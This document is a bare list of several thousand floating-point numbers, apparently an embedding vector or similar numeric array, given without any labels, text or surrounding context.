-0.016755659133195877, 0.019252048805356026, 0.007726597599685192, -0.003003468969836831, -0.010446848347783089, -0.027039701119065285, 0.0074281166307628155, -0.025628697127103806, 0.01420500036329031, 0.00602389732375741, 0.01788174919784069, 0.028437135741114616, 0.046074673533439636, -0.01598232239484787, -0.027446720749139786, -0.024556878954172134, -0.015493897721171379, 0.003741192864254117, 0.029522523283958435, 0.0020283167250454426, 0.02060878276824951, 0.006373255979269743, -0.017271218821406364, -0.012739728204905987, -0.005281085614115, -0.02252177707850933, 0.003778503043577075, 0.016796361654996872, -0.025058869272470474, 0.010216203518211842, -0.007312794215977192, -0.016999872401356697, -0.00010493486479390413, 0.0071432022377848625, -0.0024777348153293133, -0.021300718188285828, 0.017786776646971703, 0.019577665254473686, -0.011498317122459412, -0.007835136726498604, -0.00530143640935421, 0.030092351138591766, -0.00416178023442626, -0.01804455742239952, 0.04531490057706833, -0.00437207380309701, -0.0021198962349444628, -0.0020181413274258375, 0.004833363462239504, -0.003517331788316369, 0.0009624328813515604, -0.015561734326183796, 0.0016314721433445811, 0.006464835721999407, 0.007312794215977192, 0.013608038425445557, 0.0014126988826319575, 0.009571755304932594, 0.01548033021390438, -0.008974792435765266, 0.008886605501174927, 0.01416429877281189, 0.0025031734257936478, -0.032588742673397064, 0.0033121258020401, 0.0006749749882146716, 0.022671017795801163, -0.017827479168772697, 0.004979212302714586, 0.01299750804901123, -0.001189685775898397, 0.0017671454697847366, 0.001241411198861897, 0.02509957179427147, 0.00625454168766737, 0.04214014485478401, 0.01416429877281189, 0.012000308372080326, 0.02889842540025711, 0.007638410199433565, -0.009225788526237011, -0.0215449295938015, -0.012746511958539486, 0.0002283128269482404, -0.009741347283124924, 0.013499499298632145, 0.021639900282025337, 0.0019163861870765686, -0.0014847753336653113, 0.024231262505054474, -0.020920831710100174, 0.014191433787345886, -0.0016441915649920702, 0.006502145901322365, 0.03334851190447807, -0.013194234110414982, 0.02104293741285801, 0.004589151591062546, 0.020513812080025673, -0.009883804246783257, -0.017176248133182526, 0.0005931469495408237, 0.002501477487385273, -0.015195416286587715, 0.00432458845898509, -0.005935709457844496, 0.004592543002218008, -0.012190251611173153, -0.0124208964407444, -0.0038361642509698868, -0.0128414835780859, 0.0063766478560864925, 0.004002363886684179, 0.00033960738801397383, -0.010616440325975418, 0.008038646541535854, -0.009259706363081932, -0.007896189577877522, 0.006190096959471703, 0.007306010462343693, 0.0019011229742318392, 0.010670709423720837, -0.016212966293096542, -0.017094843089580536, 0.0011260889004915953, 0.03712023049592972, -0.03342991694808006, 0.006342729553580284, -0.01706770807504654, 0.0017450986197218299, 0.0016865894431248307, -0.007964026182889938, -0.018438009545207024, 0.0008861166425049305, -0.028925560414791107, 0.011946039274334908, -0.024543311446905136, -0.0014050672762095928, -0.005915358662605286, 0.0028593160677701235, 0.004439910873770714, -0.02336295321583748, -0.011165917851030827, -0.002367500215768814, 0.01378441322594881, 0.006688696797937155, 0.019523397088050842, -0.008404964581131935, 0.004541665781289339, 0.001562787569127977, 0.02419055998325348, 0.00997199211269617, 0.026212092489004135, -0.005369273014366627, 0.01804455742239952, -0.002966158790513873, 0.0039040008559823036, -0.015263252891600132, 0.02558799646794796, 0.003071305574849248, 0.007563789840787649, 0.013228152878582478, 0.009822751395404339, 0.007808001711964607, 0.00046001747250556946, 0.009693861939013004, 0.01666068844497204, 0.009659943170845509, 0.001026029814966023, 0.014991906471550465, -0.004985996056348085, -0.0012481949524953961, -0.005084359087049961, 0.03375553339719772, -0.007889405824244022, 0.024461906403303146, -0.0046502044424414635, 0.0017739292234182358, -0.00453488202765584, 0.01076568104326725, -0.00009576631418894976, -0.013689441606402397, -0.0069939615204930305, -0.0021792533807456493, 0.008594906888902187, 0.019754040986299515, 0.004823187831789255, -0.006335945799946785, -0.016294371336698532, 0.019021404907107353, -0.017257651314139366, -0.012536218389868736, 0.010263689793646336, 0.0037140583153814077, -0.003327389247715473, 0.007034663576632738, 0.025031734257936478, 0.00010991661838488653, -0.009829535149037838, 0.01263119000941515, 0.01266510784626007, 0.01590091735124588, 0.008167535997927189, -0.005932317581027746, -0.03153048828244209, 0.010670709423720837, -0.01888573169708252, 0.004517922643572092, -0.0037886786740273237, 0.006882030982524157, -0.0013592775212600827, -0.0036767481360584497, -0.024950331076979637, 0.004962252918630838, 0.001950304489582777, 0.0027660406194627285, -0.018519412726163864, -0.006851504556834698, -0.0041075111366808414, -0.006841328926384449, 0.013106046244502068, 0.01287540141493082, -0.0016552149318158627, -0.02659197896718979, -0.00013026762462686747, 0.015792379155755043, 0.017162680625915527, 0.025981448590755463, 0.008289642632007599, -0.0034545829985290766, 0.006926124915480614, -0.006912557873874903, 0.014612020924687386, 0.001086234813556075, 0.022413238883018494, 0.0004557776846922934, -0.011830717325210571, 0.009965208359062672, 0.00530143640935421, 0.0008835727348923683, 0.0028847549110651016, 0.01134907640516758, -0.011844283901154995, 0.021477092057466507, -0.0006703112157993019, 0.029875272884964943, -0.018071690574288368, -0.03055364079773426, 0.015941619873046875, -0.01436780858784914, -0.008730581030249596, 0.012780430726706982, -0.0004371225950308144, -0.001716268016025424, -0.004965644795447588, -0.0018807719461619854, -0.0006461443845182657, 0.0001545404375065118, -0.014476347714662552, -0.01671495847404003, -0.002955983392894268, 0.0033172136172652245, -0.0006999897304922342, -0.008974792435765266, 0.011803582310676575, -0.006037464365363121, 0.006848112680017948, -0.02419055998325348, -0.02914263680577278, -0.022901663556694984, 0.008255723863840103, 0.0364418625831604, -0.00939538050442934, -0.02277955785393715, 0.001591618056409061, 0.007964026182889938, -0.005348922219127417, 0.009639591909945011, -0.024963898584246635, 0.021463526412844658, 0.015141147188842297, 0.02451617643237114, 0.0030730015132576227, -0.027473855763673782, -0.0289798304438591, 0.014042193070054054, 0.016945602372288704, -0.004104119259864092, -0.0015314130578190088, -0.0026422387454658747, 0.010955623351037502, 0.01994398422539234, 0.003992188721895218, 0.01663355343043804, -0.0026914202608168125, -0.0028677955269813538, 0.016959169879555702, 0.00019937624165322632, 0.011823933571577072, 0.004911375697702169, 0.012597271241247654, 0.0032883831299841404, 0.007122851442545652, -0.007631626445800066, 0.001204101019538939, -0.008717013522982597, -0.005060616414994001, 0.005108101759105921, 0.010372227989137173, -0.010914921760559082, 0.005036873277276754, -0.014232135377824306, -0.01151188462972641, 0.015507465228438377, -0.00639699911698699, 0.009381812997162342, -0.005535473115742207, -0.0021979084704071283, 0.014978338964283466, -0.0002766464604064822, -0.011545802466571331, 0.005789860617369413, -0.033402781933546066, 0.0053421384654939175, 0.014978338964283466, 0.015466762706637383, 0.0010116144549101591, 0.007306010462343693, 0.013757278211414814, 0.0034172728192061186, 0.03047223575413227, -0.006346121430397034, 0.0004566256538964808, 0.009334326721727848, 0.011023460887372494, 0.013452013954520226, 0.022169027477502823, 0.013879384845495224, -0.00014775677118450403, -0.015466762706637383, -0.01680992916226387, 0.00816075224429369, 0.004860498011112213, -0.0069803944788873196, 0.005800036247819662, 0.014462780207395554, 0.0018315903143957257, 0.013119613751769066, -0.003159493440762162, -0.017244083806872368, -0.013241719454526901, -0.005250559188425541, 0.011376211419701576, -0.005789860617369413, -0.014449212700128555, 0.009999126195907593, -0.009585322812199593, -0.0006635275203734636, 0.006118868477642536, 0.011627206578850746, -0.02393278107047081, -0.009564971551299095, 0.009965208359062672, 0.006807410623878241, 0.007007529027760029, -0.007753732614219189, 0.002396330703049898, -0.024719685316085815, 0.011728961952030659, -0.0030085567850619555, 0.0006783668068237603, -0.004578975960612297, -0.0007156769861467183, -0.015344657003879547, -0.008391397073864937, 0.0020486677531152964, -0.006746357772499323, -0.0019994862377643585, 0.007679112255573273, 0.007970809936523438, 0.005257342476397753, 0.001119305263273418, 0.013675875030457973, -0.014815530739724636, -0.009578539058566093, -0.01146439928561449, 0.007306010462343693, 0.01624010130763054, 0.0011430480517446995, -0.008825551718473434, -0.005036873277276754, -0.012604054994881153, -0.008554205298423767, -0.0005702520720660686, 0.010867436416447163, 0.007319577969610691, 0.006278284825384617, 0.010155150666832924, 0.02461114712059498, -0.00002061599116132129, -0.008092915639281273, 0.0009174910956062376, -0.021762005984783173, -0.0057729012332856655, -0.01337739359587431, 0.012312357313930988, 0.0010896266903728247, -0.0146934250369668, -0.0007385718636214733, -0.01713554561138153, -0.0006109540699981153, -0.0008064085268415511, -0.0049181594513356686, -0.009463217109441757, 0.01171539444476366, 0.012800781056284904, 0.0041075111366808414, 0.006173138041049242, -0.018153095617890358, -0.017705373466014862, 0.008818767964839935, 0.013350258581340313, -0.014896934852004051, 0.00833034422248602, 0.007997944951057434, 0.00511149363592267, 0.019197780638933182, 0.01839730702340603, -0.024814657866954803, 0.03766292333602905, 0.028952695429325104, -0.01773250848054886, -0.010738546028733253, -0.025737237185239792, -0.005742374807596207, -0.013343474827706814, 0.00795724242925644, 0.00902906246483326, -0.009999126195907593, 0.015059743076562881, -0.027528123930096626, 0.007923324592411518, 0.005989979021251202, -0.002601536689326167, 0.028599943965673447, 0.030933525413274765, 0.0018807719461619854, 0.02088012918829918, 0.020432407036423683, -0.0013830203097313643, 0.01898070238530636, 0.004182131495326757, 0.015154714696109295, -0.002472647000104189, -0.02617139182984829, 0.022467508912086487, 0.014462780207395554, -0.006251150276511908, -0.0026252795942127705, 0.007760516367852688, -0.006227407138794661, 0.018030989915132523, 0.015358224511146545, 0.01564313843846321, -0.004792661406099796, 0.0022793123498559, 0.0021962125319987535, -0.008628825657069683, 0.0003090808750130236, -0.003710666438564658, -0.005969627760350704, -0.006237582769244909, 0.01448991522192955, 0.01872292347252369, 0.0018078475259244442, -0.012970373034477234, 0.007421332877129316, -0.025058869272470474, 0.005508338566869497, 0.01862795278429985, 0.0010998022044077516, -0.027595961466431618, 0.01341809518635273, -0.006943084299564362, 0.00949035119265318, -0.005956060718744993, -0.00311709544621408, 0.017501862719655037, 0.01748829521238804, -0.0019384331535547972, -0.01436780858784914, 0.027975846081972122, -0.023987049236893654, 0.024217694997787476, 0.011959606781601906, 0.0073534962721168995, 0.010161934420466423, 0.014015058055520058, -0.021083639934659004, 0.008147185668349266, 0.0017790169222280383, 0.000011984038792434148, -0.005569391418248415, -0.010379011742770672, 0.005501554813235998, -0.01714911311864853, -0.005633836146444082, 0.0302280243486166, 0.002331885974854231, 0.0011990133207291365, 0.004341547377407551, 0.00681080250069499, -0.0042397924698889256, -0.00639360724017024, -0.012366626411676407, 0.018180230632424355, -0.018356606364250183, -0.006841328926384449, -0.0005197985447011888, 0.021639900282025337, 0.014245702885091305, -0.022331835702061653, -0.013329907320439816, 0.006369864102452993, 0.004528098274022341, 0.017162680625915527, 0.001376236672513187, 0.017027007415890694, 0.0019384331535547972, -0.0036462214775383472, 0.010731763206422329, -0.013689441606402397, -0.015833081677556038, -0.01193247176706791, -0.007814785465598106, -0.026727652177214622, -0.007801217958331108, 0.00395148666575551, -0.010982758365571499, -0.014666290022432804, 0.004826579708606005, -0.0005795796168968081, -0.007407765369862318, -0.01773250848054886, -0.012285222299396992, 0.021504227072000504, 0.012448030523955822, -0.008499936200678349, -0.006240974646061659, 0.012699026614427567, 0.011430480517446995, -0.02177557349205017, -0.011532235890626907, 0.027948712930083275, 0.0036835316568613052, -0.024543311446905136, 0.0013423182535916567, 0.009185086004436016, 0.027460288256406784, -0.006926124915480614, 0.034243956208229065, 0.005742374807596207, -0.01171539444476366, -0.000522342452313751, 0.02060878276824951, -0.007360279560089111, 0.0012134285643696785, -0.005206465255469084, 0.01672852598130703, 0.030010947957634926, 0.00018570291285868734, 0.004677338991314173, -0.0005113189690746367, 0.022399671375751495, 0.015181848779320717, -0.0002096577372867614, 0.01303820963948965, 0.009680294431746006, -0.006383431609719992, 0.0310691986232996, 0.009388596750795841, -0.008425315842032433, 0.0015636354219168425, -0.02435336820781231, 0.016036590561270714, 0.00037649358273483813, 0.011416913010179996, 0.00960567407310009, 0.006227407138794661, 0.0027931754011660814, 0.006502145901322365, 0.015521032735705376, -0.005640619900077581, -0.004236400593072176, -0.016525015234947205, -0.007333145011216402, 0.01914351060986519, -0.0023573245853185654, 0.00927327387034893, -0.004385641310364008, -0.011030243709683418, 0.000858134008012712, -0.010609656572341919, -0.028952695429325104, 0.010324742645025253, -0.012441246770322323, 0.01172217819839716, -0.0014423774555325508, -0.014517049305140972, -0.01596875488758087, 0.004952077753841877, -0.003357915673404932, 0.008086131885647774, 0.012224169448018074, -0.013709792867302895, -0.029251176863908768, -0.013106046244502068, -0.01416429877281189, 0.001121001085266471, -0.01527682039886713, -0.009157951921224594, -0.0037547601386904716, -0.013736927881836891, 0.008540637791156769, -0.003349435981363058, 0.004124470055103302, -0.013221369124948978, -0.006403782404959202, 0.011735745705664158, 0.028030116111040115, 0.00621384009718895, 0.01598232239484787, -0.0016815017443150282, -0.005074183456599712, 0.020011819899082184, 0.0068989903666079044, -0.011084513738751411, 0.016172263771295547, -0.01963193528354168, 0.01937415637075901, 0.02187054604291916, -0.003815813222900033, 0.00790975708514452, 0.04911375790834427, -0.001923169824294746, -0.000734756060410291, -0.006590333301573992, -0.015127579681575298, -0.002928848611190915, 0.00046128942631185055, 0.00716355349868536, -0.014544184319674969, -0.01895356923341751, -0.0024692551232874393, 0.007523087784647942, -0.0323173925280571, -0.006369864102452993, -0.013017859309911728, 0.0002234370622318238, 0.007156769745051861, -0.003747976617887616, 0.017257651314139366, 0.008988359943032265, 0.015059743076562881, -0.010202636942267418, -0.006909165997058153, 0.004819795954972506, -0.017542565241456032, 0.034081146121025085, -0.001459336606785655, 0.0025506592355668545, -0.010731763206422329, 0.013513066805899143, -0.03006521612405777, 0.011410129256546497, 0.00028894186834804714, 0.0031510137487202883, -0.007733381353318691, -0.007407765369862318, 0.021409256383776665, -0.01706770807504654, -0.0048944163136184216, 0.004792661406099796, -0.0007686743629164994, 0.02178914099931717, -0.0086898785084486, -0.003023819997906685, -0.0008971400675363839, -0.0006635275203734636, -0.025275947526097298, -0.017827479168772697, 0.015602435916662216, -0.007841920480132103, -0.03264300897717476, -0.012163116596639156, 0.0013507978292182088, -0.017271218821406364, 0.0017043965635821223, 0.00395148666575551, 0.0013067040126770735, 0.011104864068329334, 0.004039674066007137, 0.027609528973698616, 0.005206465255469084, -0.003134054597467184, -0.005935709457844496, 0.0002465439320076257, -0.013336691074073315, -0.008194671012461185, -0.016932034865021706, -0.018166663125157356, 0.015059743076562881, -0.011009893380105495, -0.006576766259968281, -0.007061798591166735, 0.0002944535808637738, -0.013058560900390148, -0.0016136650228872895, -0.00755700608715415, 0.0019129944266751409, -0.009178303182125092, 0.0005181026645004749, -0.0013372305547818542, -0.0066242516040802, 0.0033799626398831606, -0.010100881569087505, -0.01457131840288639, -0.023213712498545647, -0.006542847957462072, -0.015928052365779877, 0.0025506592355668545, -0.026727652177214622, 0.018845029175281525, -0.024882493540644646, 0.004416167736053467, 0.017284786328673363, 0.013194234110414982, 0.018817894160747528, 0.01362838875502348, -0.0010845388751477003, 0.018817894160747528, -0.00790297333151102, -0.016023023054003716, 0.013106046244502068, 0.0004718888958450407, 0.0032307219225913286, 0.004385641310364008, 0.036631807684898376, -0.010290823876857758, 0.030255159363150597, 0.02642917074263096, 0.007258524652570486, -0.00416517211124301, 0.006298635620623827, -0.004585759714245796, -0.00020393401791807264, -0.0091172493994236, -0.02220972813665867, -0.00902906246483326, 0.00602389732375741, 0.011281239800155163, -0.01573810912668705, -0.002752473345026374, 0.004595934879034758, -0.014598453417420387, 0.016511447727680206, 0.012244520708918571, -0.00660390080884099, 0.01394722145050764, 0.015086877159774303, 0.01573810912668705, -0.026537708938121796, 0.016172263771295547, 0.00043118689791299403, 0.001608577324077487, 0.014625588431954384, 0.0060713826678693295, -0.001297376467846334, -0.02376997284591198, -0.01830233633518219, 0.014842665754258633, -0.00011882018588948995, -0.006125652231276035, -0.033918339759111404, -0.009124033153057098, -0.005715240258723497, 0.005036873277276754, 0.020812293514609337, -0.023566462099552155, 0.0016068813856691122, -0.001297376467846334, -0.02244037389755249, 0.007095716893672943, 0.0031951076816767454, -0.019482694566249847, -0.0016255364753305912, -0.015602435916662216, -0.008201454766094685, 0.01789531670510769, 0.006508929654955864, 0.014191433787345886, -0.04593899846076965, -0.004965644795447588, -0.005664362572133541, 0.005657579284161329, -0.005705064628273249, -0.018017422407865524, 0.012203819118440151, 0.004439910873770714, -0.004266927018761635, -0.018112393096089363, -0.008832335472106934, -0.01573810912668705, 0.004819795954972506, 0.035220805555582047, -0.014666290022432804, 0.010942056775093079, 0.013614821247756481, -0.0019469127291813493, 0.02276599034667015, 0.0043890331871807575, -0.0072178225964307785, -0.007943674921989441, 0.0265105739235878, 0.008126834407448769, -0.0014915589708834887, -0.02078515850007534, -0.0031374464742839336, 0.01358768716454506, -0.01615869626402855, 0.0005083511350676417, 0.006922733038663864, 0.011756096966564655, -0.009720996022224426, -0.000013805823982693255, 0.007618058938533068, -0.012488733045756817, -0.01828876882791519, 0.030770717188715935, -0.011362643912434578, 0.004185523372143507, 0.0023759796749800444, -0.0034291441552340984, 0.009225788526237011, 0.012909320183098316, 0.002464167308062315, 0.01689133234322071, 0.018003854900598526, -0.025398053228855133, -0.012766863219439983, -0.022250430658459663, 0.0043890331871807575, -0.004402600694447756, -0.0048571061342954636, -0.011064162477850914, -0.004999563097953796, 0.017705373466014862, 0.0012185163795948029, -0.0008759411284700036, -0.012292006053030491, -0.012909320183098316, -0.002148726722225547, -0.003415576880797744, -0.016796361654996872, -0.020825861021876335, -0.010039828717708588, 0.002277616411447525, 0.014544184319674969, 0.0013881080085411668, -0.017447594553232193, -0.03123200684785843, 0.02302376925945282, 0.015955187380313873, 0.02294236421585083, -0.013920086435973644, 0.0034596705809235573, -0.008574556559324265, -0.01151188462972641, 0.021585632115602493, -0.016131563112139702, 0.01035187765955925, 0.014435645192861557, -0.014272836968302727, -0.006705655716359615, 0.00852707028388977, -0.025303080677986145, -0.0007254285155795515, 0.00833034422248602, -0.0018400698900222778, -0.014924069866538048, 0.012888968922197819, -0.008404964581131935, 0.013329907320439816, 0.005101318471133709, 0.019401289522647858, 0.0006520801107399166, 0.017094843089580536, 0.0017586658941581845, 0.009001927450299263, 0.005559215787798166, -0.021110774949193, -0.002335277618840337, -0.0030017730314284563, 0.015358224511146545, -0.0023437573108822107, 0.004796053282916546, 0.0003936647262889892, -0.008147185668349266, 0.01081316638737917, -0.0025540508795529604, 0.005203073378652334, -0.014584885910153389, -0.031259141862392426, 0.004429735243320465, -0.012583703733980656, 0.015588869340717793, 0.01018228568136692, 0.008703446015715599, -0.024556878954172134, -0.0027117712888866663, 0.025153839960694313, 0.01022977102547884, 0.01847871206700802, -0.0040328907780349255, -0.0022877920418977737, -0.0023251022212207317, -0.008025079034268856, -0.00623079901561141, -0.0017383148660883307, -0.019767608493566513, 0.00019895225705113262, 0.008140401914715767, 0.004015931393951178, -0.00943608209490776, -0.0031577975023537874, -0.010758897289633751, -0.014096462167799473, 0.02088012918829918, 0.0053794486448168755, 0.004073592834174633, -0.004941902123391628, 0.02005252242088318, 0.007170337252318859, 0.00026859084027819335, -0.013865817338228226, -0.008832335472106934, 0.0027728243730962276, 0.005593134090304375, -0.010609656572341919, 0.011281239800155163, -0.013316339813172817, 0.006586941424757242, -0.020161060616374016, -0.012102063745260239, 0.014883367344737053, 0.002781303832307458, 0.01721694879233837, -0.008622041903436184, -0.018275201320648193, 0.018695788457989693, 0.009822751395404339, -0.02005252242088318, -0.008825551718473434, -0.0010387491201981902, -0.009578539058566093, -0.00001768788388289977, 0.002126679988577962, -0.013872601091861725, -0.002621887717396021, 0.019577665254473686, 0.014042193070054054, -0.023552894592285156, 0.019021404907107353, 0.006183313205838203, 0.0045382739044725895, 0.026049284264445305, 0.011172701604664326, 0.011701826937496662, -0.013974356465041637, 0.0003095048596151173, -0.035899169743061066, -0.01591448485851288, 0.011315158568322659, 0.009361461736261845, -0.01971333846449852, -0.0030102527234703302, -0.01346558053046465, -0.0026100161485373974, 0.0031306627206504345, 0.003173060715198517, -0.01337739359587431, 0.005074183456599712, 0.008778066374361515, -0.012366626411676407, -0.01615869626402855, 0.0001825230719987303, -0.02159919962286949, 0.016267236322164536, -0.004517922643572092, 0.0109691908583045, 0.0024760388769209385, -0.00923257227987051, 0.03248020261526108, 0.004019323270767927, -0.014408511109650135, 0.002669373294338584, 0.013519850559532642, 0.0020469718147069216, 0.0007716422551311553, 0.019767608493566513, -0.01664712093770504, 0.01888573169708252, 0.0165657177567482, 0.013282421976327896, 0.012610838748514652, -0.02965819649398327, -0.012929671443998814, -0.007584140636026859, -0.015860214829444885, 0.019075674936175346, -0.011444048024713993, -0.0027490814682096243, -0.011572937481105328, 0.0072042555548250675, -0.01321458537131548, -0.025981448590755463, 0.006257933564484119, 0.006013721693307161, -0.0007004137150943279, 0.00658015813678503, -0.02459757961332798, 0.0018587249796837568, 0.022291133180260658, 0.004796053282916546, 0.027202509343624115, 0.01225808821618557, -0.004294062033295631, 0.02085299603641033, -0.011260888539254665, -0.0032324178609997034, 0.03665894269943237, -0.018912866711616516, 0.009266490116715431, 0.012373410165309906, -0.025560861453413963, 0.008825551718473434, 0.0069803944788873196, 0.003907392732799053, 0.001950304489582777, -0.01400149054825306, -0.005209857132285833, -0.018614385277032852, 0.001772233285009861, -0.006837937515228987, 0.04040352627635002, 0.016416477039456367, -0.04249289631843567, 0.014191433787345886, -0.005345530342310667, 0.01246838178485632, -0.012292006053030491, 0.0060951258055865765, 0.026103554293513298, 0.018193798139691353, 0.017108410596847534, 0.0030458669643849134, -0.001716268016025424, -0.009327543899416924, 0.01230557356029749, -0.006556414999067783, 0.013933653943240643, -0.0051047103479504585, 0.007970809936523438, 0.007312794215977192, 0.027311047539114952, -0.0006647994741797447, -0.0033562197349965572, 0.0010362053290009499, -0.03155762329697609, -0.00625454168766737, -0.00980918388813734, -0.02060878276824951, 0.014801963232457638, -0.034162551164627075, -0.001305856043472886, -0.0061697461642324924, -0.011817149817943573, 0.0008187039056792855, -0.011193051934242249, -0.009388596750795841, -0.00980918388813734, -0.015236117877066135, -0.011803582310676575, -0.0019723514560610056, -0.018098825588822365, 0.03923673555254936, -0.002789783524349332, -0.001654367079026997, 0.010297607630491257, -0.00012136405712226406, 0.005389624275267124, -0.008947658352553844, -0.0026625897735357285, -0.007855487056076527, -0.008940874598920345, -0.01937415637075901, -0.021463526412844658, 0.004063417203724384, 0.010453632101416588, -0.028382867574691772, -0.007984377443790436, 0.009259706363081932, -0.023797107860445976, -0.008547421544790268, 0.012644757516682148, 0.00676670903339982, 0.025696534663438797, -0.017759643495082855, -0.004270318895578384, -0.02079872600734234, 0.009001927450299263, 0.017854614183306694, 0.020758023485541344, 0.04121756553649902, -0.007977593690156937, 0.026971863582730293, 0.0038870417047291994, 0.00237089185975492, 0.02060878276824951, 0.001637407811358571, 0.003144229995086789, -0.01400149054825306, -0.014408511109650135, 0.009164735674858093, 0.0004778246220666915, 0.025533726438879967, 0.016280803829431534, 0.003145925933495164, -0.024896061047911644, 0.004673947114497423, 0.011172701604664326, -0.0037751111667603254, -0.0044636535458266735, 0.008391397073864937, -0.006363080348819494, 0.0004010843695141375, -0.006152786780148745, 0.002409897977486253, -0.013228152878582478, -0.0028949303086847067, -0.010697844438254833, 0.008873037993907928, 0.009191869758069515, 0.026022151112556458, 0.025696534663438797, -0.012983940541744232, -0.0026541100814938545, -0.01687776669859886, 0.002292879857122898, 0.0028898424934595823, -0.0016450395341962576, -0.01672852598130703, 0.004402600694447756, -0.0035885602701455355, 0.0019469127291813493, -0.001703548594377935, 0.025560861453413963, 0.00923257227987051, 0.003598735900595784, -0.004087159875780344, -0.004039674066007137, 0.016090860590338707, 0.016443612053990364, 0.014978338964283466, -0.021070072427392006, -0.0026558060199022293, -0.017583267763257027, -0.0169863048940897, -0.005956060718744993, 0.004453477915376425, 0.003815813222900033, -0.008194671012461185, 0.0007457794854417443, -0.01192568801343441, -0.02954965829849243, -0.005976411513984203, 0.025628697127103806, 0.016932034865021706, -0.003544466570019722, -0.008893388323485851, 0.025967881083488464, -0.010446848347783089, -0.006454660091549158, 0.008791633881628513, 0.008506719954311848, -0.016185831278562546, -0.01250908337533474, -0.00509453471750021, 0.00621384009718895, 0.006576766259968281, -0.00018231107969768345, -0.00160433747805655, -0.0007614667410962284, 0.04205873981118202, -0.019021404907107353, -0.008554205298423767, -0.0021707736887037754, 0.006960043217986822, 0.009910939261317253, -0.004670555237680674, -0.00864917691797018, -0.008106483146548271, 0.01341809518635273, 0.005644011776894331, 0.010887786746025085, -0.011281239800155163, 0.0057220240123569965, 0.012102063745260239, 0.008384613320231438, 0.0022640491370111704, 0.0059831952676177025, -0.005901791155338287, -0.012346276082098484, 0.031774699687957764, 0.0022827042266726494, 0.019265616312623024, -0.00197743927128613, 0.009219004772603512, -0.006827761884778738, -0.002947503700852394, 0.02461114712059498, 0.0017069404711946845, -0.019089242443442345, -0.020106792449951172, 0.024719685316085815, -0.001455096760764718, -0.008798417635262012, -0.00812005065381527, -0.005074183456599712, -0.006203664466738701, -0.025370918214321136, -0.014313539490103722, -0.0017518822569400072, 0.012081712484359741, -0.014639155939221382, -0.002265745075419545, 0.015154714696109295, 0.01548033021390438, -0.0009802400600165129, -0.007964026182889938, 0.004775702487677336, 0.0038497315254062414, -0.01448991522192955, 0.006651386618614197, -0.019482694566249847, 0.005762726068496704, -0.011939255520701408, 0.015398926101624966, 0.007197471801191568, -0.00886625424027443, 0.01022298727184534, -0.011667909100651741, -0.014706992544233799, 0.0057729012332856655, 0.015507465228438377, 0.009293625131249428, -0.006088342051953077, 0.008825551718473434, 0.00849315244704485, -0.009877020493149757, -0.022481076419353485, 0.0010268777841702104, 0.016918467357754707, 0.03435249626636505, -0.023878511041402817, 0.026551276445388794, 0.01994398422539234, -0.006556414999067783, -0.00414142943918705, -0.003809029469266534, -0.00032837194157764316, -0.020595215260982513, 0.0007627386949025095, 0.024719685316085815, 0.007611275650560856, 0.000370981841115281, 0.010528252460062504, -0.02044597454369068, 0.020147493109107018, 0.005440501496195793, 0.004087159875780344, 0.010663925670087337, 0.012800781056284904, -0.013363826088607311, -0.0007525631808675826, -0.012007092125713825, 0.014232135377824306, -0.01573810912668705, -0.006692088674753904, 0.0004956317134201527, 0.0010107664857059717, 0.030526505783200264, 0.034162551164627075, -0.008384613320231438, 0.005321787670254707, 0.022711720317602158, 0.003778503043577075, 0.002311534946784377, -0.007780867163091898, 0.024312665686011314, 0.00530143640935421, 0.012983940541744232, 0.00311709544621408, 0.010548603720963001, -0.008181103505194187, -0.019686205312609673, -0.016104428097605705, 0.013526634313166142, 0.02094796672463417, -0.003471542149782181, -0.010643575340509415, 0.0006618315819650888, -0.000036250225093681365, -0.004188914783298969, 0.031259141862392426, -0.0071432022377848625, 0.002360716462135315, 0.007862270809710026, -0.00376832764595747, -0.004182131495326757, -0.015751676633954048, -0.006383431609719992, -0.0033799626398831606, 0.01353341806679964, -0.011776447296142578, -0.011586504988372326, -0.005016522482037544, -0.024041319265961647, -0.00002358384517719969, 0.005830562673509121, -0.017108410596847534, 0.02533021569252014, 0.012271655723452568, -0.013669091276824474, -0.011362643912434578, 0.023295115679502487, -0.02245394140481949, -0.029468253254890442, 0.00432458845898509, 0.0004246152238920331, 0.03701169416308403, 0.00237089185975492, 0.0007593468180857599, 0.015670273452997208, -0.01573810912668705, -0.009524269960820675, 0.004792661406099796, 0.01229878980666399, -0.023580029606819153, 0.019984686747193336, 0.03825988620519638, -0.010650359094142914, 0.0029084975831210613, 0.004670555237680674, -0.005199681501835585, 0.012481949292123318, -0.00041253180825151503, -0.007936891168355942, 0.008947658352553844, 0.013438446447253227, 0.0032442891970276833, 0.005209857132285833, -0.0042771026492118835, 0.003332476830109954, -0.006051031872630119, 0.003378266701474786, -0.008581340312957764, -0.024719685316085815, 0.010636791586875916, -0.010582522489130497, 0.015331089496612549, 0.013716576620936394, 0.010881002992391586, -0.03296862542629242, 0.009252923540771008, 0.0006024744943715632, 0.008757715113461018, -0.03212745115160942, -0.01789531670510769, 0.001904514734633267, 0.013736927881836891, 0.006112084724009037, -0.017868181690573692, -0.020554514601826668, -0.020975101739168167, -0.0075027369894087315, 0.01856011524796486, 0.0039955805987119675, -0.008764498867094517, -0.012936455197632313, -0.003798854071646929, -0.0049317264929413795, -0.0039955805987119675, 0.00584073830395937, 0.006536064203828573, -0.00681419437751174, 0.0003277359646745026, 0.00024781585671007633, -0.010128016583621502, 0.006203664466738701, 0.039372410625219345, 0.0017154200468212366, -0.0009302104590460658, -0.0014237223658710718, -0.0006635275203734636, -0.0003548706299625337, -0.006166354287415743, -0.015005473978817463, 0.029929542914032936, -0.011627206578850746, 0.007394198328256607, -0.0128414835780859, 0.006115476600825787, 0.01953696459531784, 0.007760516367852688, 0.017583267763257027, 0.0010200940305367112, -0.00471804104745388, -0.010046612471342087, 0.002174165565520525, -0.007421332877129316, 0.005243775434792042, -0.01002626121044159, -0.005681321956217289, 0.005521905608475208, -0.0019062106730416417, 0.045667652040719986, 0.0036733562592417, 0.0026066245045512915, -0.016579285264015198, 0.004494179971516132, 0.002974638482555747, 0.011125215329229832, -0.01457131840288639, -0.009619241580367088, 0.0008407508721575141, -0.013126397505402565, 0.0008555901004001498, 0.014381376095116138, -0.0007377238944172859, -0.019984686747193336, 0.0012337795924395323, 0.020500244572758675, 0.009585322812199593, 0.009958424605429173, 0.007061798591166735, 0.01353341806679964, -0.00906298030167818, 0.011803582310676575, 0.012800781056284904, 0.018248066306114197, 0.025303080677986145, 0.019401289522647858, 0.006291851866990328, 0.02244037389755249, -0.03505799546837807, 0.02320014499127865, -0.005657579284161329, 0.006549631245434284, -0.008642393164336681, 0.020771590992808342, 0.002013053512200713, 